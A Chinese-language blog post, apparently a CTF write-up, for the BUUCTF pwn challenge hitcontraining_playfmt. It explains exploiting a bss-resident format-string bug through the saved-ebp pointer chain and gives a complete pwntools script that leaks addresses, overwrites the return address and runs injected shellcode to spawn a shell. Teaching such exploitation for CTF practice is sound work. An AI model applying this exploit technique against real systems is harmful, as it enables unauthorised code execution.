hitcontraining_playfmt

最新推荐文章于 2024-07-22 00:00:18 发布
最新推荐文章于 2024-07-22 00:00:18 发布
阅读量444 收藏
点赞数
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123633026
版权

hitcontraining_playfmt

查看保护
在这里插入图片描述
在这里插入图片描述
格式 化漏洞,这个buf在bss上,也就是bss上的格式化漏洞。
攻击思路:可以执行shellcode,所以可以在bss上写入shellcode然后持劫ret_addr到shellcode的开头
既然不是栈上的所以需要借助ebp这个链子来完成
在这里插入图片描述
第六个位置是ebp第十个位置是ce78。
先将ce78里存放的ce88给改成ce6c,因为ce6c这里放着ret_addr(因为我们最后就是需要将ret_addr改成shellcode的头)
改完之后ce88这里就是ce6c了,而ce6c的后面又是play+77,接着将第十位置改成buf_addr + 4,也就是将play +77改成buf_addr + 4(为什么是四,因为最后输入quit这四个字进行退出来执行shellcode。)
注意:这里笔者没有patchelf,地址和远程的不一样,具体的需要通过格式化来泄露出stack_addr然后对stack_addr进行操作
还有第二种方法,就是劫持ret_addr为one_gadget也可以,只不过这样相对于shellcode打法有一点点麻烦。

from pwn import *
from time import sleep

context(arch='i386', os='linux', log_level='debug')

file_name = './z1r0'
debug = 1
if debug:
    r = remote('node4.buuoj.cn', 26962)
else:
    r = process(file_name)

elf = ELF(file_name)
def dbg():
    gdb.attach(r, 'b *0x0804854f')

p1 = '%15$p'
r.sendline(p1)

r.recvuntil('0x')
libc_start_main = int(r.recv(8), 16) - 229
success('libc_start_main = ' + hex(libc_start_main))

libc = ELF('./libc-2.23.so')
libc_base = libc_start_main - libc.sym['__libc_start_main']

p1 = '%6$p'
r.sendline(p1)

r.recvuntil('0x')
stack_addr = int(r.recv(8), 16) - 0x28
success('stack_addr = ' + hex(stack_addr))

p2 = '%' + str((stack_addr + 0x1c) & 0xff) + 'c%6$hhn' 
r.sendline(p2)

p3 = '%' + str(0xa064) + 'c%10$hn'
r.sendline(p3)

shellcode = asm(shellcraft.sh())
p4 = b'quit' + shellcode
r.send(p4)

r.sendline('quit')

r.interactive()
z1r0.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
hitcontraining_playfmt 解题思路
Morphy_Amo的博客
03-19 735
格式化字符串
BUUCTF hitcontraining_magicheap[堆]
weixin_45441024的博客
12-28 391
BUUCTF hitcontraining_magicheap[堆](Unsorted bin attack) 我们先来学习一下什么是Unsorted binattack 用ctfwiki里面的例子来进行解释: Unsorted Bin Attack,顾名思义,该攻击与 Glibc 堆管理中的的 Unsorted Bin 的机制紧密相关。 Unsorted Bin Attack 被利用的前提是控制 Unsorted Bin Chunk 的 bk 指针。 Unsorted Bin Attack 可以达到的效
非栈上的格式化字符串漏洞(bss段)-playfmt
最新发布
zhuo1358的博客
07-22 866
已buu上的hitcontraining_playfmt为例没有开FULL RELRO,也就是说got表可改,那么我们的思路就是把printf的got表改成system,输入/bin/sh即可拿到shell最终exp把libc地址抓进栈中因为libc的地址只有低8位不同,通过写入低字节把printf_got抓到栈中把print_got+2抓入栈中(把print_got改成system要一半一半的改)把printf_got改成systemnum2是计算用来进行格式字符串漏洞利用时的一个重要部分。
暑假集训——Hitcon_Trainning——lab9_playfmt——格式化字符串漏洞_字符串在bss段
qq_41667316的博客
07-13 755
格式化字符串漏洞 思路 一开始就是没有思路,太菜了,真的太菜了TAT。 这里的buf是在bss段,也就是意味着没有办法用常规方法做。 看了大佬的wp才知道可以控制ebp来实现地址任意写。 但是我觉得或许用栈迁移也可以试一下。 先写一波控制ebp! 控制ebp 首先,格式化字符串漏洞的两个利用方式 泄露栈上内容 改写某地址内容(前提是这个地址要在栈上,也就是printf可控的地方) 原理...
HITCON-Training-master lab2 wp
zszcr的博客
04-03 681
查看了下防护机制发现开启了Canary,但是没关系,它没开启堆栈不可执行,说明 这是一道shell code题简单跑了一下程序,发现输出了一句话:give me you shellcodeida反编译查看了下代码代码逻辑也很简单,你输入一段shellcode,然后去执行它我随便去网上找了一段shellcode,输入后发现不行,说明它不是单纯的让我们输入shellcode查看了一下orw_secco...
hitcontrainingUAF之我见
TedLau的博客
06-16 317
hictontrainingUAF,太菜学了几天才懂这里的门道。我觉得我理解了这个题...继续学吧!
【CTF】【PWN】【UAF】【萌新友好向wp】hitcontraining_uaf
m0_50819561的博客
10-08 391
这题的反编译有点阴间。 这是add函数,add一次会malloc两个chunk。 同时要注意,这里的notelist是一个二维数组。notelist[i]表示的其实是notelist[i][0].后面还有一个notelist[i][1]。 我们看notelist[i],他被赋值为print_note_content这个地址的函数。 notelist[i][1]才是真正存放chunk的content的地方。 为什么要把notelist[i]赋值为print_note_content这个地址的函数呢? 下面这
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 937
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1766
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
hitcontraining_uaf
z1r0的博客
12-10 1576
hitcontraining_uaf 查看保护 有uaf,还有后门函数 这里会将show的功能存放在堆里,没有pie所以思路就是将print_note_content这个功能改成magic就可以了,改完show一下就可以执行magic。 申请两个0x10堆, 释放掉,有uaf,没有清0。 这时再申请一个0x8的堆,因为fastbin,填充content时其实就改的是print_note_content。 content放入magic即可。 from pwn import * context(arc
[BUUCTF]PWN——hitcontraining_uaf
mcmuyanga的博客
09-07 1712
[BUUCTF]——hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945 堆的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项 add ...
hitcontraining_bamboobox
像初雪一样自由洒落
04-24 733
hitcontraining_bamboobox这道题有两种解题方式: house of force 参考:house of force unlink house of force(详解) 知识点 只要top chunk size够大,就能随意申请chunk 所以,如果有溢出能控制top chunk size,就可以修改其为-1(0xffffffff最大值),然后malloc(负数)可以向上申请,malloc(正数) 题目流程 程序一开始申请0x10的块,存放hello_message和.
use after free HITCON-training (lab 10 hacknote)
九层台
08-06 872
liu@liu-F117-F:~/1t/u18/文档/堆溢出学习/use after free$ checksec hacknote [*] '/home/liu/1t/u18/\xe6\x96\x87\xe6\xa1\xa3/\xe5\xa0\x86\xe6\xba\xa2\xe5\x87\xba\xe5\xad\xa6\xe4\xb9\xa0/use after free/hacknote' ...
暑假集训——Hitcon_Trainning——lab10_hacknote——堆UAF
qq_41667316的博客
07-13 279
堆漏洞-UAF 思路 本来就是打pwn苦手,搞堆真的更加难受[留下心酸泪水] 这道题做第二次了,寒假集训的时候也做了。但谁能想到,第二次做的时候仍旧是较为懵逼。 UAF 全称 use after free,是在free之后指针没有置NULL留下的漏洞。这就导致之前的指针还可以控制这块内存。 本题 这道题在ctfwiki上有详细解释。 这道题利用的是内存分配机制的fastbins。 fastbi...
HITCON-Training-Writeup
baikeng3674的博客
03-14 570
HITCON-Training-Writeup 原文链接M4x@10.0.0.55 项目地址M4x's github,欢迎star~ 更新时间5月16 复习一下二进制基础,写写HITCON-Training的writeup,题目地址:https://github.com/scwuaptx/HITCON-Training Outline Basic Knowledge In...
buuctf hitcon_training,axb_2019_heap,unlink一般利用方法总结
weixin_46521144的博客
07-10 213
两道都是使用了unlink 并且两道题的方法一模一样,和上一篇的ZCTF的一道题也一样 使用unlink的题目一般有这样的特征 指针位置泄露(这三道题全都是在bss上的指针) 存在off-by-one或者off-by-null以及其他溢出修改漏洞 第一条用于控制unlink堆块的检验,第二条用于激活unlink,两者缺一不可。 利用方法: 制造unlink块,修改fd为ptr-0x18,bk为ptr-0x10,构造chunk_head和下一个chunk的prev_size,通过off修改下一个chun
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值